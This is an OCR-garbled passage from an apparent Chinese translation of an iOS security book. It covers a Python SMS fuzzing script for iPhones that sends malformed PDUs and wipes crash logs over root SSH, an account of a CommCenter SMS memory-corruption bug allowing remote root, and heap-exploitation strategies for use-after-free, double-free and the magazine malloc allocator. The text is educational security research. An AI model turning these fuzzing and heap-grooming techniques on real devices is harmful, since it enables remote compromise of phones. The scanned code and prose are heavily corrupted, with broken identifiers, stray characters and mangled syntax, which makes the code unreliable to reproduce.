text from message where ROWID = (select MAX(ROWID) from message);' 


给 定 一 个 随机 的 数字 ， 以 下 Python 代码 将 进行 检查 ， 以 确定 iPhone 仍然 会 处 理 和 存储 标准 的 
SMS 消 息 。 这 里 假设 用 户 已 经 为 OS 上 运行 的 SSH 服 务 器 设置 了 公 钥 认证 。 


def eight bit encoder (string): 
ret = "" 
strlen = len(string) 
for i in range(0,strlen): 
temp = "%02x" % ord(string[i]) 
ret += temp.upper() 
return ret 





def create test pdu(n): 
tn = str(n) 
ret = '0791947106004034040D91947196466656F8000690108211421540' 
ret += "%02x" % lenl(tn) 
ret += eight_ bit_ encoder (tn) 
return ret 


def get_service check(randnum, ip): 

pdu = create_ test_ pdu (randnum) 

send_pdu (pdu) 

time.sleep(1) 

command = 'ssh root@'+ip+' "sqlite3-line 
/private/var/mobile/Library/SMS/sms.db \'select text from message 
where ROWID = (select MAX(ROWID) from message);\'"! 

C = os.popen(command) 

last msg = c.read() 

last msg = last msg[last msg.find('=')+2:len(last msg)-1] 

return last_ msg 


如 果 一 切 运 转正 常 ，get_service_check 困 数 会 返回 含有 randnum 的 字符 串 ， 否 则 会 返回 
其 他 内 容 。 剩 下 的 就 是 要 把 所 有 内 容 整 合成 如 下 模糊 测试 脚本 : 


#!/usr/bin/python2.5 
import socket 

import time 

import os 

import sys 

import random 











def eight bit encoder (string): 
ret = "" 
strlen = len(string) 
for i in range(0,strlen): 
temp = "%02x" % ord(string[i]) 
ret += temp.upper() 
return ret 


def create test pdul(n): 


tn = str(n) 
ret = '0791947106004034040D91947196466656F8000690108211421540' 
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ret += "%02x" % Jen(tn) 
ret += eight_ bit_ encoder (tn) 
return ret 


def restore_ service(ip): 
command = 'ssh root@'+ip+' "./lc.sh"' 
Cc = os.popen (command) 
time.sleep(60) 


def clean logs (ip): 


commcenter = '/private/var/logs/CrashReporter/LatestCrash.plist' 
springboard = 
'/private/var/mobile/Library/Logs/CrashReporter/LatestCrash.plist' 
command = 'ssh root@'+ip+' "rm -rf %s 2>/dev/null; rm -rf 
$s 2>/dev/null"' % (commcenter, springboard) 
C = os.popenl(command) 


def check_for_service(Ip) : 
times = 0 
while True: 
randnum = random.randrange(0, 99999999) 
last_ msg = get_service check (randnum, ip) 


if(last_ msg == str (randnum)): 
if(times == 0): 
print "Passed!" 
else: 
print "Lost %d messages" % times 
break 


else: 
times += 1 
if(times > 500): 
restore_service (ip) 
break 


def get_service check (randnum, ip): 
pdu = create_ test_pdu (rangdnum) 
send_pdu (pdu) 
time.sleep (1) 


command = 'ssh root@'+ip+' "sqlite3 -line 
/private/var/mobile/Library/SMS/sms.db \'select text from message 
where ROWID = (Select MAX (ROWID) from message);\'"' 

C = os.popenl(command) 

last msg = C.read() 

last msg = last msg[last msg.find('=')+2:len(last msg)-1] 


return last_msg 


def check_ for_ crash(test number, ip): 
time.sleep (3) 
commcenter = '/private/var/logs/CrashReporter/LatestCrash.plist' 
springboard = 
'/private/var/mobile/Library/Logs/CrashReporter/LatestCrash.plist' 


command = 'ssh root@'+ip+' "cat %s 2>/dev/null; cat %s 2>/dev/null"' 


(commcenter, springboard) 
C = os.popenl(command) 
crash = C.read() 
if crash : 
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clean_ logs (ip) 
print "CRASH with %d" % test_ number 
print crash 
print "\n\n\n" 
time.sleep(60) 
else: 
Beint © yy 
c.close() 


def send pdul(line, ip): 
leng = (len(line) / 2) - 8 
buffer = "\n+CMT: ,%d\n%s\n" % (leng, line) 
S = socket.socket (socket.AF_INET, socket.SOCK STREAM) 
s.connect((ip, 4223)) 
s.send(buffer) 
s.close() 








# test either sends the pdu on the line 
# or checks for crash/service if test case is complete 
# as indicated by the [end casel] in file 
def test(i, ip): 
global lines 
line = lines[i].rstrip() 
print 本 QQ $$ 和 I) 
If line.find('end case') >= 0: 
check_for_crash(i, ip) 
check_for_ service(i, ip) 





else: 
send pdu(line, ip) 
time.sleep(1) 


def read testcases (filename): 
global lines 
f = open(filename, 'r') 
lines = 上 .readqlines() 
f.close() 


def testall (ip, filename): 
global lines 
read_testcases (filename) 
for i in range(len(lines)): 
test(i; :ip) 


和 下 name == '_ main _': 
testall(sys.argv[1], sys.argv[2]) 


给 定安 装 有 注入 程序 的 让 hone 的 IP 地 址 ， 以 及 格式 适当 的 含有 测试 用 PDU 的 文件 ， 该 脚本 就 
会 发 送 各 个 测试 用 例 , 最 后 还 会 检测 崩 江 以 及 程序 是 否 仍然 起 作用 。 拥有 如 此 强大 模糊 测试 工具 
的 优势 在 于 , 一 旦 开始 模糊 测试 , 我 们 就 可 以 完全 不 用 管 它 了 ,然后 就 等 着 工具 执行 每 个 测试 用 
例 ， 并 将 崩溃 以 及 引发 崩溃 的 测试 用 例 一 起 记录 下 来 。 此 外 ， 只 要 针对 某 个 i 值 调用 est (i)， 
我 们 就 很 容易 重复 进行 该 测试 。 这 真是 :OS 中 SMS 模 糊 测 试 的 终极 选择 。 在 下 一 节 中 ， 大 家 会 看 
到 这 种 对 细节 的 关注 带 来 的 一 些 回报 。 
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6.9.10 SMS bug 


在 smsfuzzing ( http://www.blackhat.com/presentations/bh-usa-09/MILLER/BHUSA09-Miller- 
FuzzingPhone-PAPER.pdf ) 中 ，Miller 和 Mnulliner 介 绍 了 自己 利用 本 章 之 前 几 节 概述 过 的 模糊 测试 
法 找到 的 若干 个 iOS SMS 漏 洞 。 有 些 bug 是 在 SpringBoard 试 图 显示 文本 消息 引发 的 无 效 警 告 时 出 
现 的 。 这 既 可 能 会 带 来 进程 骨 泪 造成 屏幕 卡 死 , 也 可 能 让 人 在 SpringBoard 的 上 下 文中 ( 以 mobile 
用 户 权 限 ) 执行 代码 。 另 一 个 漏洞 是 在 CommCenter 本 身 中 发 现 的 。 它 可 以 导致 CommCenter 衣 演 ， 
使 手机 短 时 间 内 处 于 不 在 网 状态 , 在 某 些 特殊 情况 下 还 可 能 会 让 人 远程 执行 代码 。 因 为 在 发 现 这 
一 结果 的 时 候 CommCenter 是 以 root 权 限 运 行 的 , 所 以 这 可 使 人 能 从 服务 器 端 以 root 权限 远程 访 
问 任意 iPhone 。 为 说 明 SMS 漏 洞 是 什么 样 的 ， 本 节 简 要 介绍 一 下 Miller 和 Mulliner 发 现 的 
CommCenter 漏 洞 。 

大 家 已 经 见 过 iOS 5 中 负责 处 理 UDH 的 代码 的 反 编 译文 件 。 而 在 iOS 3 中 , 情况 有 些许 不 同 ( 如 
图 6-9 所 示 )。 














图 6-9 IDA Pro 中 对 UDH 的 解析 
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在 图 6-9 中 ， 大 家 可 以 看 到 代码 按照 UDHL 中 指定 的 次 数 循环 。 每 一 次 循环 它 都 会 读 取 IEI 
和 IEDL， 并 处理 对 应 的 数据 。 之 后 ， 它 会 对 这 些 信息 进行 处 理 。 在 指定 的 UDHL 比 实际 可 用 
的 数据 更 长 时 ， 问 题 就 米 了 。 当 这 种 情况 发 生 时 ， read_next_byte 捕 数 会 返回 值 -1。 就 这 
个 函数 本 身 来 说 ， 这 是 没有 问题 的 ， 不 过 后 面 的 代码 假设 这 个 值 会 是 正 值 并 且 是 有 意义 的 。 
例如 ， 如 图 6-10 所 示 ， 大 家 可 以 让 CommCenter 调 用 abort() ， 在 总 消息 数 为 -1 时 退出 


CommCenter。 

















图 6-10 ”负责 中 止 CommCenter 的 代码 





如 果 发 送 了 这 种 畸形 的 SMS ， 而 且 CommCenter 在 调用 abort () 后 退出 了 ， 它 会 重启 ， 不 过 
如 果 CommCenter 朋 溃 了 , 那么 手机 就 会 从 运营 商 网 络 离线 。 这 会 让 手机 在 几 秒 钟 内 接 不 到 电话 ， 
并 且 会 使 正在 进行 的 通话 中 断 。 

不 过 , 这 个 bug 不 单单 会 造成 拒绝 服务 。 它 最 终 可 能 对 内 存 产 生 影响 , 并 让 人 可 以 执行 代码 。 
如 果 安 排 的 消息 使 当前 的 消息 计数 需 为 -1， 该 值 就 会 被 作为 索引 来 访问 一 个 数组 。-1 这 个 值 就 
会 从 已 分 配 缓冲 区 之 前 的 位 置 读 取 一 个 值 。 我 们 假设 这 个 指针 是 指向 某 个 C++ 字符 串 的 ， 因 而 有 
多 种 方式 调用 该 指针 。 来 看 图 6-11。 

这 不 是 唯一 的 SMS bug， 所 以 请 大 家 了 解 更 多 的 bug。 这 类 漏洞 特别 重要 ， 因 为 它们 不 需 
要 任何 用 户 交 互 而 且 没 法 阻拦 。 这 不 免 让 人 联想 到 10 年 前 防火 墙 还 未 普及 时 计算 机 网 络 的 安 
全 情况 。 
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图 6-11 iOS SMS 栈 中 的 内 存 破坏 


6.10 小结 


寻找 漏洞 在 任何 系统 中 都 是 件 困 难 却 很 重要 的 工作 。 所 有 的 计算 机 漏洞 攻击 都 是 以 漏洞 为 基 
础 的 ， 没 有 漏洞 ， 也 就 没有 漏洞 攻击 程序 、 有 效 载 荷 或 rootkit。 模 糊 测试 是 最 简单 有 效 的 一 种 漏 
洞 寻 找 方式 。 本 章 介 绍 了 模糊 测试 ， 并 列举 了 一 些 进行 模糊 测试 的 例子 ， 比 如 对 Mac OS X 中 的 
PDF 、iPhone 上 的 PPT 以 及 iPhone 上 的 SMS 接 口 进行 的 模糊 测试 。 本 章 还 通过 介绍 一 些 已 经 确定 
的 bug 展 示 了 模糊 测试 技术 的 威力 。 
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漏洞 芭 击 











iOS 的 受 攻击 面 与 Mac OS X 的 受 攻击 面 是 类 似 的 。 因此 , 如 果 要 对 用 户 空 间 的 漏洞 进行 攻击 ， 
就 应 该 将 注意 力 放 在 客户 端的 堆 漏洞 攻击 上 。 


注意 我 们 不 打算 介绍 与 栈 有 关 的 bug， 因 为 尽管 在 菜 些 软件 中 也 存在 这 样 的 bug， 但 它们 一 般 
来 说 不 大 可 能 成 为 漏洞 攻击 的 对 象 ， 而 且 出 现 的 频率 也 要 比 和 堆 有 关 的 问题 低 。 


本 章 首先 介绍 了 大 多 数 客户 端 应 用 程序 中 都 会 出 现 的 常见 bug 类 , 然后 深入 介绍 针对 这 些 bug 
编写 成 功 攻 击 代 码 所 需 的 概念 。 

在 当今 针对 应 用 程序 的 漏洞 攻击 中 , 充分 了 解 应 用 程序 中 分 配 程序 的 工作 原理 及 如 何 尽 可 能 
准确 地 控制 这 些 分 配 程序 至 关 重 要 。 在 本 章 中 ， 大 家 会 了 解 到 iOS 系 统 自 带 的 分 配 程序 ， 以 及 用 
于 控制 其 布局 的 技巧 。 

Web 浏 览 器 是 最 常 被 攻击 的 一 个 目标 。MobileSafari 使 用 了 TCMalloc 而 非 系 统 自 带 的 分 配 程 
序 ， 所 以 本 章 还 要 剖析 它 的 工作 原理 以 及 如 何 利 用 它 的 本 性 改善 漏洞 攻击 程序 的 可 靠 性 。 

最 后 ， 我 们 要 对 一 个 客户 端 漏 洞 攻击 的 例子 一 一 Pwn20wn 2010 大 赛 上 针对 MobileSafari 的 漏 
洞 攻击 一 一 进行 分 析 ， 以 说 明 本 章 描 述 的 计数 在 现实 中 是 如 何 应 用 的 。 


7.1 针对 bug 类 的 漏洞 攻击 


根据 目标 软件 的 不 同 , 出 现在 软件 中 的 漏洞 其 类 型 也 是 多 种 多 样 。 比 方 说 , 在 说 到 浏览 颖 时 ， 
所 要 处 理 的 bug 类 很 可 能 是 对 象 生存 期 问题 ， 其 中 包括 释放 后 使 用 ( use-after-free ) 和 两 次 释放 
( double-free ) 等 pug。 而 如 果 目 标 是 二 进 制 格式 解析 程序 ( 比如 PDF 阅读 器 )， 那 么 bug 类 就 最 可 
能 是 算术 问题 或 溢出 。 

本 节 将 简要 描述 在 针对 前 面 提 到 的 bug 类 中 的 bug 进 行 漏洞 攻击 时 最 常用 的 策略 , 这 样 大 家 就 
能 够 领会 分 配 程 序 的 行为 细节 中 分 别 有 哪 些 是 与 各 bug 类 相关 的 。 


对 象 生存 期 漏洞 
当 攻 击 者 对 应 用 程序 的 行为 (例如 , 通过 JavaScript ) 拥有 很 大 的 控制 权时 ,软件 中 通常 就 会 
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出 现 对 象 生 存 期 问题 ， 比 如 释放 后 使 用 和 两 次 释放 bug。 
释放 后 使 用 bug 通 常会 在 对 象 被 释放 后 接着 被 在 代码 路 径 中 再 次 使 用 时 出 现 。 这 样 的 bug 往 往 
会 在 对 象 寿 命 管理 很 不 明确 时 出 现 , 这 也 是 浏览 器 会 遇 到 大 量 这 种 bug 的 一 个 原因 。 图 7-1 展 示 了 


这 类 bug 的 特点 。 
易 受 攻击 的 对 象 Cr ) 
又 J 入 


攻击 者 替换 该 对 象 攻击 者 控制 
的 对 象 
































易 受 攻击 的 对 象 


应 用 程序 试图 使 用 该 对 象 
易 受 攻击 的 对 象 < 应 用 程序 


| 使 用 的 是 攻击 者 控制 的 对 象 




















攻击 者 控制 
的 对 象 














图 7-1 释放 后 使 用 的 典型 情形 

总 的 说 来 ， 对 这 些 漏 洞 进行 漏洞 攻击 的 策略 非常 简单 : 

(1) 强制 释放 易 受 攻击 的 对 象 ; 

(2) 用 自己 可 以 控制 的 内 容 替 代 这 个 对 象 ; 

(3) 触发 对 该 对 象 的 使 用 ， 获 得 代码 执行 权 。 

对 于 想 执行 代码 的 攻击 者 来 说 ， 最 简单 的 办 法 就 是 用 能 控制 的 地 址 替换 对 象 的 虚拟 表 指 针 ， 
这 样 一 来 ， 只 要 执行 间接 调用 ， 执 行 权 就 可 能 被 支持 。 

当 对 象 在 其 生存 期 内 不 止 一 次 被 释放 , 两 次 释放 的 漏洞 就 会 出 现 。 利 用 两 次 释放 开展 漏洞 攻 
击 有 着 不 同 的 形式 和 风格 ,但 多 数 情况 下 可 以 视 作 释放 后 使 用 bug 的 子 类 型 。 第 一 种 策略 就 是 按 
照 以 下 方式 把 两 次 释放 问题 变 成 释放 后 使 用 问题 来 处 理 。 

(1) 在 易 受 攻击 的 对 象 第 一 次 释放 后 ， 用 一 个 合法 的 对 象 替 代 该 对 象 。 因 为 存在 两 次 释放 漏 
洞 ， 新 创建 的 对 象 也 会 被 释放 。 

(2) 用 自己 能 控制 的 对 象 替 换 这 个 新 创建 的 对 象 。 

(3) 让 应 用 程序 使 用 这 个 自己 能 控制 的 对 象 获取 代码 执行 权 。 
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第 二 种 策略 是 检查 易 受 攻击 的 对 象 被 释放 时 采用 的 全 部 代码 路 径 , 并 确定 能 否 通过 专门 构造 
的 数据 控制 对 象 内 容 夺取 代码 执行 权 。 例 如 ， 如 果 在 对 象 的 析 构 函数 中 触发 了 间接 调用 ( 对 对 象 
本 身 或 对 象 的 成 员 )， 攻 击 者 就 可 以 按照 与 攻击 释放 后 使 用 pug 十 分 类 似 的 方式 接管 应 用 程序 。 

现在 应 该 很 清楚 了， 要 对 这 些 漏洞 进行 漏洞 攻击 ， 我 们 就 必须 了 解 分 配 一 释放 的 各 种 花招 。 














在 下 一 节 中 ,大 家 会 看 到 一 些 要 求 把 更 多 注意 力 放 在 后 者 上 的 bug 类 。 

算术 和 溢出 漏洞 通常 让 攻击 者 几乎 能 在 任意 位 置 重 写 4 个 或 更 多 字 节 。 不 管 是 发 生 整数 溢出 、 
让 攻击 者 能 写 人 超过 缓冲 区 大 小 的 数据 、 让 攻击 者 能 分 配 大 小 不 能 满足 需求 的 缓冲 区 , 还 是 攻击 
者 最 后 有 机 会 向 比 预期 小 的 缓冲 区 中 写 数据 , 攻击 者 需要 的 都 是 一 种 可 以 控制 堆 布 局 从 而 重 写 数 
据 的 可 靠 方法 。 

特别 是 在 过 去 ， 通 常 的 策略 是 重 写 堆 的 元 数据 ， 这 样 的 话 ， 当 链表 的 某 个 元 素 脱离 链表 时 ， 
攻击 者 就 可 能 重 写 任意 的 内 存 位 置 。 现 在 , 更 常见 的 做 法 是 重 写 应 用 程序 特有 的 数据 ， 因 为 堆 通 
常会 对 其 数据 结构 的 一 致 性 进行 检查 。 重 写 应 用 程序 特有 的 数据 往往 需要 确保 进行 溢出 的 缓冲 区 
与 需要 重 写 的 缓冲 区 离 得 很 近 。 在 本 章 后 面 的 内 容 中 , 大 家 将 学 习 如 何 用 一 些 在 大 多 数 情 况 下 都 
能 奏效 的 简单 技巧 来 执行 这 些 操作 。 


7.2 理解 jiOS 系统 自 带 的 分 配 程序 


iOS 系 统 自 带 的 分 配 程序 名 叫 magazine malloc。 要 研究 该 分 配 程序 的 实现 ， 请 参考 Mac OS X 
自 带 的 分 配 程序 ( 其 实现 位 于 Mac OS X Libc 源 代码 的 magazine malloc.c 文 件 中 )。 

虽然 人 们 针对 以 前 版 本 的 Mac OS X 分 配 程序 也 开展 过 一 些 研究 ， 但 与 magazine malloc 程 序 漏洞 
攻击 有 关 的 信息 很 匮乏 。 要 了 解 现 有 的 与 该 主题 有 关 的 最 佳 研究 资料 , 请 参考 Dino Dai Zovi 和 Charlie 
Miller 编 著 的 The Mac Hackers Handbook (WileyPublishing，978-0-470-39536-3 ) 以 及 其 他 一 些 白皮书 。 

本 节 涵 盖 了 大 家 创建 针对 iOS 分 配 程 序 的 漏洞 攻击 程序 所 需 的 概念 。 






























































































































































7.2.1 区 域 


magazine malloc 程 序 在 执行 分 配 时 用 到 了 区 域 (region ) 的 概念 。 具 体 来 讲 就 是 把 堆 划 分 成 3 
种 区 域 : 
口 微型 (小 于 496 字 节 ); 
口 小 型 (大 于 496 字 节 但 小 于 15 360 字 节 ); 
口 大 型 (大 于 15 360 字 节 )。 
各 个 区 域 是 由 内 存 块 阵 列 (也 叫 作 量子 ) 和 确定 这 些 量子 使 用 状态 的 元 数据 组 成 的 。 各 个 区 
域 之 间 略 有 区 别 ， 而 这 取决 于 区 域 大 小 和 量子 大 小 这 两 个 因素 : 
口 微型 区 域 大 小 为 1 MB ， 并 且 使 用 了 大 小 为 16 字 节 的 量子 ; 
口 小 型 区 域 大 小 为 8 MB ， 并 且 使 用 了 大 小 为 $S12 字 节 的 量子 ; 
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口 大 型 区 域 大 小 各 异 ， 而 且 没 有 使 用 量子 。 
分 配 程 序 为 微型 和 小 型 区 域 维护 着 32 个 自由 列表 ( freelist ), 第 1 个 至 第 31 个 自由 列表 是 用 于 
分 配 的 ， 而 最 后 的 那个 列表 则 用 于 两 个 或 多 个 彼此 邻近 的 对 象 被 释放 后 结合 成 的 块 。 
magazine malloc 程 序 与 OS 上 以 前 使 用 的 分 配 程序 之 间 存 在 一 个 主要 区 别 : magazine malloc 
旦 序 分 别 为 系统 中 存在 的 各 个 CPU 维 护 着 单独 的 区 域 。 这 使 得 magazine malloc 程 序 比 以 前 的 分 配 
程序 更 容易 调节 区 域 大 小 。 但 本 章 中 并 未 考虑 这 一 差别 ， 因 为 只 有 下 hone 4S 和 iPad 之 后 的 设备 才 
使 用 了 双核 处 理 器 ， 其 他 运行 OS 的 苹果 产品 都 只 有 一 个 CPU。 


7.2.2 ”内 存 分 配 


在 应 用 程序 请 求 系统 为 其 分 配 内 存 时 , magazine malloc 程 序 首先 会 根据 请 求 的 大 小 确定 哪个 区 域 
是 合适 的 。 针 对 微型 区 域 和 小 型 区 域 的 行为 是 相同 的 ， 而 大 型 区 域 的 分 配 过 程 会 略 有 差异 。 本 节 将 
会 从 头 到 尾 地 介绍 微型 区 域 和 大 型 区 域 的 分 配 过 程 , 以 便 大 家 能 够 完整 地 了 解 内 存 分 配 过 程 的 原理 。 

每 当 有 内 存 块 被 释放 时 ，magazine malloc 程 序 就 会 在 一 个 名 为 mag_last_free 的 专用 结构 
成 员 中 保留 对 该 内 存 块 的 引用 。 如 果 新 的 内 存 分 配 请 求 所 请 求 的 大 小 与 mag_1last_free 引 用 的 
内 存 块 大 小 相同 ， 它 就 会 被 返回 给 调用 程序 ， 指 针 则 被 置 为 NULL。 

如 果 大 小 不 同 ，magazine malloc 程 序 会 在 空闲 表 中 查找 大 小 刚好 相同 的 具体 区 域 。 如 果 这 一 
尝试 还 是 不 成 功 ， 它 就 会 检查 最 后 的 空闲 表 , 正如 之 前 提 过 的 ,该 空闲 表 的 作用 是 存储 合并 而 来 
的 较 大 内 存 块 。 

如 果 最 后 的 空闲 表 非 空 ， 其 中 的 内 存 块 会 被 分 为 两 部 分 ,一 部 分 返回 给 调用 程序 ， 另 一 部 分 
则 放 回 该 空闲 表 。 

如 果 以 上 尝试 全 都 失败 , 未 能 分 配合 适 的 内 存 区 域 , magazine malloc 程 序 就 会 用 mmap ( ) 分 配 一 
个 新 内 存 块 ， 并 为 其 指定 合适 的 区 域 类 型 。 这 一 过 程 是 由 内 存 分 配 请 求 未 得 到 满足 的 线程 执行 的 。 

对 于 大 型 对 象 而 言 ， 分 配 过 程 就 简单 得 多 了 。 大 型 对 象 并 不 是 利用 32 个 空闲 表 ， 而 是 具有 包 
含 所 有 可 用 数据 项 的 缓存 。 因 此 , 分 配 程序 首先 会 寻找 具有 合适 大 小 的 已 分 配 内 存 页 。 如 果 没 找 
到 ， 它 就 会 搜寻 更 大 的 内 存 块 ， 并 对 其 进行 分 割 , 使 得 其 中 的 一 部 分 能 满足 要 求 ， 而 男 一 部 分 则 
会 被 放 回 可 用 内 存 块 列表 中 。 

最 后 ， 如 果 没 有 内 存 区 域 可 用 ， 就 会 使 用 mmap ( ) 执行 分 配 。 


7.2.3 内存 释 放 


在 进行 分 配 时 内 存 区 域 上 存在 的 区 别 对 于 释放 而 言 是 相同 的 。 因 此 , 在 讲解 内 存 释 放 时 , 我 
们 也 是 分 微型 内 存 对 象 和 大 型 内 存 对 象 这 两 类 来 介绍 。 

在 释放 微型 对 象 时 ， 分 配 程序 会 将 其 放 入 区 域 缓存 中 ， 也 就 是 放 进 mag_last_free。 

之 前 存在 的 内 存 区 域 会 按照 以 下 3 个 步骤 被 移动 到 合适 的 空闲 表 中 。 首 先 ， 分 配 程序 会 检查 
对 象 是 否 可 以 与 排 在 它 前 面 的 对 象 合并 , 然后 验证 对 象 能 否 与 排 在 它 后 面 的 对 象 合 并 。 根据 这 些 
合并 操作 是 否 成 功 ， 对 象 会 被 置 于 相应 的 位 置 。 
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如 果 合 并 后 的 对 象 大 于 微型 区 域 的 合适 大 小 , 该 对 象 就 会 被 放 和 人 最 后 的 空闲 表 中 ( 回想 一 下 
7.2.2 节 ， 这 个 区 域 放置 着 大 小 超出 给 定 区 域 预期 的 对 象 )。 

当 微 型 区 域 只 包含 释放 后 的 内 存 块 时 ， 整 个 区 域 就 会 被 释放 给 系统 。 

对 于 大 型 对 象 而 言 ， 过 程 略 有 差异 。 如 果 对 象 比 某 个 国 值 大 , 那么 该 对 象 就 会 立即 被 释放 给 
系统 ,否则 做 法 与 释放 微型 和 小 型 对 象 时 类 似 ， 对 象 会 被 放置 到 专门 的 位 置 ， 即 
large_entry_cache newest, 

如 果 大 型 对 象 缓存 中 有 足够 的 空间 , 也 就 是 说 , 如 果 缓 存 中 数据 项 的 数量 没有 超过 允许 放置 
其 中 的 最 大 元 素数 , 处 在 最 近 位 置 的 对 象 就 会 被 放 进去 。 缓存 的 大 小 取决 于 所 使 用 的 架构 和 操作 
系统 。 

如 果 缓 存 容 纳 不 下 对 象 ， 对 象 就 会 被 直接 释放 而 不 放 和 缓存 中 。 同 样 ， 如 果 在 把 对 象 放 和 人 组 
存 中 后 缓存 大 小 变 得 太 大 ， 绥 存 中 最 旧 的 对 象 就 会 被 删除 。 


7.3 驯服 iOS 的 分 配 程序 


本 节 给 出 了 若干 个 例子 , 以便 大 家 可 以 更 好 地 理解 分 配 程序 的 本 质 , 并 了 解 如 何在 进行 漏洞 
攻击 时 让 分 配 程序 为 己 所 用 。 

大 多 数 情 况 下 ， 大 家 要 直接 在 设备 上 进行 处 理 。 作 出 该 选择 的 主要 原因 是 magazine malloc 会 
保存 各 CPU 上 微型 和 小 型 区 域 的 缓存 ， 因 此 英特尔 计算 机 上 的 行为 与 在 iPhone 上 的 行为 相 比 可 能 
就 太 不 精确 了 。 不 过 ， 在 调试 现实 的 漏洞 攻击 程序 时 ， 一 般 人 们 还 是 会 用 Mac OS X 上 运行 的 虚 
拟 机 进行 处 理 , 这 从 可 用 的 RAM 和 CPU 数量 上 讲 已 经 是 尽 可 能 地 接近 iPhone 了 。 另 一 种 更 容易 的 
可 行 选 择 是 使 用 越狱 过 的 iPhone， 这 样 就 可 以 使 用 gdb 和 其 他 一 些 工 具 了 。 




































































7.3.1 所 需 工 具 


我 们 有 很 多 可 以 在 Mac OS X 上 对 与 堆 有 关 的 问题 进行 调试 的 辅助 工具 可 用 ,但 不 巧 的 是 ， 
这 些 工 具 中 只 有 一 小 部 分 可 以 在 未 越 狄 的 Phone 上 使 用 。 

本 节 会 讨论 在 Mac OS X 和 iOS 上 可 以 使 用 的 所 有 工具 ， 并 指明 哪些 在 两 种 平台 上 都 能 使 用 ， 
而 哪些 只 能 在 Mac OS X 使 用 。 

有 一 些 环境 变量 可 以 减轻 调试 任务 ， 最 重要 的 几 个 如 下 所 示 。 
口 MallocScribble 为 所 有 已 释放 的 内 存 填充 0x55。 
口 MallocPreScribble 为 所 有 未 初始 化 的 内 存 填 充 0xAA。 
口 MallocStackLogging 记录 内 存 块 的 完整 历史 和 栈 日 志 (可 利用 malloc_history 查 

看 结果 )。 

这 些 环境 变量 是 在 Mac OS X 和 iOS 中 都 可 以 使 用 的 。 

另 一 个 实用 工具 是 crashwrangler, 它 用 于 确定 所 处 理 bug 的 类 型 。 当 应 用 程序 骨 演 时 , 它 会 分 
辨 朋 省 的 原因 ， 并 和 弄 清楚 它 有 没有 可 能 被 利用 。 一 般 来 说 ，crashwrangler 并 不 适用 于 预测 可 利用 
性 ,但 对 于 理解 应 用 程序 为 何 崩 演 来 说 还 是 相当 有 用 的 。 
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最 后 ， 大 家 可 以 使 用 Dtrace 查 看 系统 自 带 分 配 程序 分 配 和 释放 内 存 块 的 过 程 。The Mac 
Hacker”s Handbook 介 绍 了 许多 用 于 调试 的 实用 Dtrace 脚 本 。 
Dtrace 和 crashwrangler 都 是 只 能 在 Mac OS X 上 使 用 的 。 


7.3.2 与 分 配 / 释 放 有 关 的 基础 知识 











注意 本 书 配套 网 站 www.wiley.com/go/ioshackershandbook 提 供 了 本 章 中 用 到 的 代码 。 








在 过 去 ， 要 对 算术 bug 进 行 漏洞 攻击 ， 最 简单 的 办 法 就 是 重 写 堆 的 元 数据 信息 。 不 过 ， 这 一 招 
对 magazine malloc 程 序 来 说 已 经 行 不 通 了 。 每 当 对 象 被 释放 时 , 都 会 有 以 下 函数 来 验证 它 的 完整 性 : 


static INLINE void * 
free _ list unchecksum ptr(szone t *szone, ptr union *ptr) 
{ 

ptr_union p; 

uintptr_t t = ptr->u; 








t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // 编译 成 循环 移 位 指令 
Di st GE (uintptr. t)0xF:; 








if ((t & (uintptr t)0xF) != free_ list gen checksum(p.u ^ szone->cookie)) 
{ 
free_list_ checksum botch(szone, (free_ list t *)ptr); 
return NULL; 
} 
return p.p; 


} 

具体 来 说 ， 当 对 象 被 释放 后 , 要 对 其 堆 的 元 数据 的 前 驱 和 后 继 元 素 进 行 验证 , 方法 是 将 这 两 
个 元 素 分 别 与 随机 生成 的 cookie 进 行 异 或 运算 。 得 到 的 结果 会 分 别 放 到 各 自 指针 的 高 4 位 中 。 

我 们 不 需要 验证 在 大 型 区 域 中 分 配 的 对 象 的 元 数据 。 不过, 这 些 对 象 的 元 数据 都 是 分 开 存 储 
的 ， 因 此 针对 大 对 象 的 经 典 攻击 也 就 不 可 行 了 。 

除非 攻击 者 可 以 读 取 用 于 验证 堆 的 元 数据 的 cookie， 不 然 他 只 能 选择 重 写 应 用 程序 特有 的 数 
据 。 出 于 这 一 原因 ， 大 家 应 该 试 着 了 解 进行 漏洞 攻击 时 可 能 用 到 的 常见 操作 。 

对 于 攻击 者 来 说 , 要 想 可 靠 地 重 写 应 用 程序 特有 的 数据 , 能 够 将 内 存 对 象 置 于 内 存 中 相互 临 
近 的 位 置 是 相当 重要 的 。 

为 了 更 好 地 理解 如 何 控 制 堆 的 布局 , 首先 我 们 来 看 一 个 简单 的 例子 , 它 说 明了 分 配 和 释放 对 
象 的 方式 。 请 在 测试 用 的 iOS 设 备 上 运行 该 应 用 程序 。 


#define DebugBreak() \ 























dol{\ 

_asm ("mov r0, #20\nmov ip, rO\nsvc 128\nmov rl1, #37\nmov ip, rl\nmov rl, #2\nmov 
r2, #1\n svc 128\n" \ 

Memory ip, "EO EL "E22 ) 

} while (0) 
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int main(int argc, char *argv[]) 
{ 
unsigned long *ptrl, *ptr2, *ptr3, *ptr4; 
ptr1 = malloc(24); 
Dtr2 二 malloco(24):; 
(24); 
(24) 


’ 


ptr3 = malloc 
ptr4 = malloc 


memset (ptrl, Oxaa, 24); 
memset (ptr2, 0xbb, 24); 
memset (ptr3, Oxcc, 24); 
DebugBreak (); 


free(ptrl1); 
DebugBreak (); 
free(ptr3); 
DebugBreak () ; 
free (ptr2); 
DebugBreak () 
free(ptr4); 
DebugBreak (); 


@autoreleasepool { 
return UIApplicationMain(argc, argv, nil, NSStringFromClass 
([bookAppDelegate class])); 
} 
} 


该 应 用 程序 首先 会 在 微型 区 域 中 分 配 四 个 缓冲 区 , 然后 开始 逐一 释放 它们 。 这 里 要 用 到 一 个 创 
造 软件 断 点 的 宏 ， pe i 用 程序 时 ， 就 可 以 让 Xcode 自动 中 断 进 入 gdb 了 了。 
在 第 一 个 断 点 处 ， 这 些 缓冲 区 就 已 经 分 配 好 并 被 置 人 内 存 中 了 : 


GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011) 
Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "--host=i386-apple-darwin 
--target=arm-apple-darwin".tty /dev/ttys002 

